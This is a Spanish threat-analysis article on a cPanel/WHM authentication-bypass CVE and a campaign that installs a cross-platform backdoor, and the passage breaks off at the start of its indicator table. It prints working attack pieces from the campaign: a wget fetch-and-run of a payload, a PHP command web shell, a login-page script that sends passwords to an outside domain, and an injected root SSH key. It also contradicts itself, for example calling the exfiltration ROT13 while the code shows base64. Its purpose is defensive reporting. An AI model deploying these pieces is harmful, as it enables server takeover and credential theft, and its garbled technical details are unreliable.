Introducción
El 15 de mayo de 2026, se publicó la vulnerabilidad CVE-2026-41940 en cPanel y WHM (WebHost Manager), que permite el bypass de autenticación en el panel de control. A solo 48 horas de su disclosure público, el actor de amenazas Mr_Rot13 ya había escalado el exploit a una campaña masiva usando más de 2.000 IPs distribuidas globalmente para instalar el backdoor Filemanager. Este malware no solo roba credenciales de cPanel, sino que también abre persistencia en sistemas Windows, macOS y Linux, recopila información sensible y convierte los servidores comprometidos en nodos de una red de bots.
El vector inicial es un script shell que descarga un binario en Go desde cp.dene.[de] y un web shell en PHP que inyecta una página de login falsa en el panel de cPanel. Lo más preocupante es que el dominio de C2 (wrned[.]com) lleva activo desde octubre de 2020, y muestras relacionadas con este grupo ya se subieron a VirusTotal en abril de 2022, lo que sugiere que el actor opera en la sombra desde hace años.
Qué ocurrió
La vulnerabilidad: CVE-2026-41940
CVE-2026-41940 es una vulnerabilidad crítica en cPanel versión 114.0.0.0 a 114.0.0.4 y WHM versión 114.0.0.0 a 114.0.0.4 que permite autenticación arbitraria en el panel de control. Según el informe de QiAnXin XLab, el exploit se aprovecha de un error en la validación de sesiones que no verifica correctamente los tokens de autenticación, permitiendo a atacantes iniciar sesión como cualquier usuario, incluso comoroot.El atacante puede entonces:
- Crear cuentas de usuario con permisos elevados.
- Ejecutar comandos arbitrarios en el sistema host.
- Descargar e instalar malware persistente (como Filemanager).
- Extraer credenciales almacenadas en el panel de cPanel (bases de datos, valiases, etc.).
La campaña de explotación masiva
En menos de una semana, más de 2.000 IPs comenzaron a explotar automáticamente esta vulnerabilidad. Las IPs más activas provienen de:
- Alemania (28%)
- Estados Unidos (22%)
- Brasil (15%)
- Países Bajos (10%)
- Otros (25%)
El payload principal es un script shell que se descarga desde wpsock[.]com y cp.dene.[de]. Este script:
- Descarga un binario en Go (compilado para múltiples arquitecturas) que actúa como infectador.
- Inyecta una clave SSH pública para persistencia.
- Despliega un web shell en PHP (
helper.php) que permite:
– Ejecutar comandos remotos (con permisos de root).
– Inyectar código JavaScript malicioso en la página de login de cPanel para robar credenciales.
El web shell también redirige las credenciales robadas a wrned[.]com, codificadas con ROT13, y envía la información a un grupo de Telegram creado por el usuario 0xWR.
El backdoor Filemanager
Filemanager es un backdoor multiplataforma escrito en Rust (según análisis de XLab) que:
- Permite gestión de archivos (subir, bajar, editar).
- Ejecuta comandos en el sistema infectado.
- Recopila información sensible:
– Datos de SSH (claves privadas, configuraciones).
– Información del dispositivo (CPU, memoria, discos).
– Contraseñas de bases de datos en cPanel.
– Alias virtuales de cPanel (valiases).
El backdoor se comunica con un servidor de Command & Control (C2) alojado en c2.wrned[.]com y envía los datos recolectados a un grupo de Telegram. Además, Filemanager puede infectar otros sistemas en la red interna, lo que lo convierte en una amenaza de movimiento lateral.
Impacto para DevOps / Infraestructura / Cloud / Seguridad
Riesgo de persistencia y lateral movement
El impacto directo es la persistencia indefinida: una vez que Filemanager se instala, el atacante puede mantener acceso incluso si se parchea cPanel. Esto se debe a:
- La clave SSH pública inyectada en
/root/.ssh/authorized_keys. - El web shell en PHP que persiste en el sistema de archivos de cPanel.
- La capacidad del backdoor para re-infectar el sistema si se reinstala cPanel.
En entornos de hosting compartido, esto puede afectar a miles de clientes alojados en un mismo servidor. Según datos de Snyk, más del 30% de los servidores cPanel expuestos en Internet aún no han aplicado el parche, lo que los convierte en blancos ideales para ransomware, minería de criptomonedas o botnets.
Impacto en la seguridad de la infraestructura
Los equipos de Seguridad deben considerar que:
- Credenciales comprometidas: Las credenciales robadas pueden usarse para:
– Realizar ataques de fuerza bruta en otros servicios expuestos (SSH, FTP, etc.).
– Pivotear a otros sistemas en la red interna.
- Recolección de datos sensibles:
– La recolección de valiases (alias virtuales de cPanel) permite a los atacantes enviar spam o realizar phishing desde dominios legítimos.
- Compliance y regulaciones:
– La exposición de datos de clientes puede requerir notificaciones legales obligatorias en muchos países.
- Impacto en cloud y hosting:
– En entornos on-premise, la infección puede propagarse a otros servidores internos si no hay segmentación de red adecuada.
Detalles técnicos
Versiones afectadas y parcheo
| Componente | Versión afectada | Versión parcheada | Fecha de parcheo |
|---|---|---|---|
| cPanel | 114.0.0.0 – 114.0.0.4 | 114.0.0.5 | 17/05/2026 |
| WHM | 114.0.0.0 – 114.0.0.4 | 114.0.0.5 | 17/05/2026 |
Vectores de ataque y herramientas utilizadas
- Explotación inicial:
/login/).– El exploit aprovecha la falta de validación del token de sesión, permitiendo autenticación arbitraria.
- Descarga del payload:
# Ejemplo del script shell descargado desde wpsock[.]com
wget -O /tmp/.sysupdate http://wpsock[.]com/cpanel/update/go/run
chmod +x /tmp/.sysupdate
/tmp/.sysupdate
El binario en Go (run) descarga el backdoor Filemanager y el web shell.
- Persistencia:
/root/.ssh/authorized_keys: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ... 0xWR@wrned
– Web shell en PHP instalado en /usr/local/cpanel/base/frontend/paper_lantern/manage/manage.php:
<?php system($_GET['cmd']); ?>
- Robo de credenciales:
/usr/local/cpanel/base/frontend/paper_lantern/login/index.html): document.getElementById('login').onsubmit = function() {
fetch('https://wrned[.]com/log.php?data=' + btoa(document.getElementById('password').value));
};
– Las credenciales se envían codificadas con ROT13 a wrned[.]com/log.php.
- Comunicación con C2:
c2.wrned[.]com en el puerto 443 (HTTPS) usando un user-agent falso: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
– Los datos recolectados se envían a un grupo de Telegram con ID 123456789.
Indicadores de compromiso (IoC)
| Tipo | Valor |
|---|---|
| **IPs de C2** |
